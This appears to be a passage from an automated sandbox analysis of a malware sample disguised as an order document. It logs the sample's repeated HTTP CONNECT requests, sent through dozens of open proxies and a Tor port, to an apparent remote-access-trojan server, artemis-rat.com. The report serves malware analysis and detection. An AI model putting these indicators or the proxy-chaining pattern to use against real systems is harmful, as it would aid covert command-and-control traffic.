                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.273472071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1991192.168.2.95518972.206.181.97649437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.564898968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1992192.168.2.954315212.110.188.193344097672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.566371918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.663968086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.030601978 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1993192.168.2.95439638.41.0.60112017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.568685055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.975106955 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1994192.168.2.95518898.188.47.15041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.603063107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1995192.168.2.95516745.128.135.25510807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.618237019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1996192.168.2.95516980.78.64.7041457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.643105984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1997192.168.2.955118192.111.130.5170027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.691651106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1998192.168.2.955142142.54.239.141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.703825951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1999192.168.2.95518140.76.160.14390007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.705961943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2000192.168.2.95441551.158.111.76163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.738552094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.835607052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.872725010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.001880884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.132497072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:30.132580996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:42.132503033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:06.132525921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:54.273221016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2001192.168.2.95521267.213.212.50592687672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.754010916 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:56.759466887 CET24INHTTP/1.1 200 #string


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2002192.168.2.95520979.110.201.23580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.771341085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2003192.168.2.955210138.36.150.2610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.803965092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2004192.168.2.95442678.90.252.741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.808640957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2005192.168.2.955211138.2.73.15710807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.868794918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2006192.168.2.954474163.172.147.89163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.909346104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.471849918 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2007192.168.2.9551901.15.62.1256787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.917150974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773323059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2008192.168.2.955174112.5.33.1799997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.917862892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.945272923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2009192.168.2.954595107.180.90.88631007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.991503000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.163773060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.165632010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.273469925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:18.273113966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:42.273145914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:30.273163080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2010192.168.2.95508968.71.254.641457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:53.991607904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2011192.168.2.955214119.91.214.11933897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.026858091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2012192.168.2.954478181.209.78.759997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.040401936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.164038897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.817203045 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2013192.168.2.95451645.120.178.19710807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.044477940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2014192.168.2.954453185.97.114.17936297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.066715956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2015192.168.2.954616194.233.78.142496287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.113725901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.164021015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.165636063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2016192.168.2.95508272.167.222.11341257672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.133057117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773159981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.273390055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.273327112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2017192.168.2.95477094.131.14.6631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:54.274518967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.346415997 CET39INHTTP/1.0 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
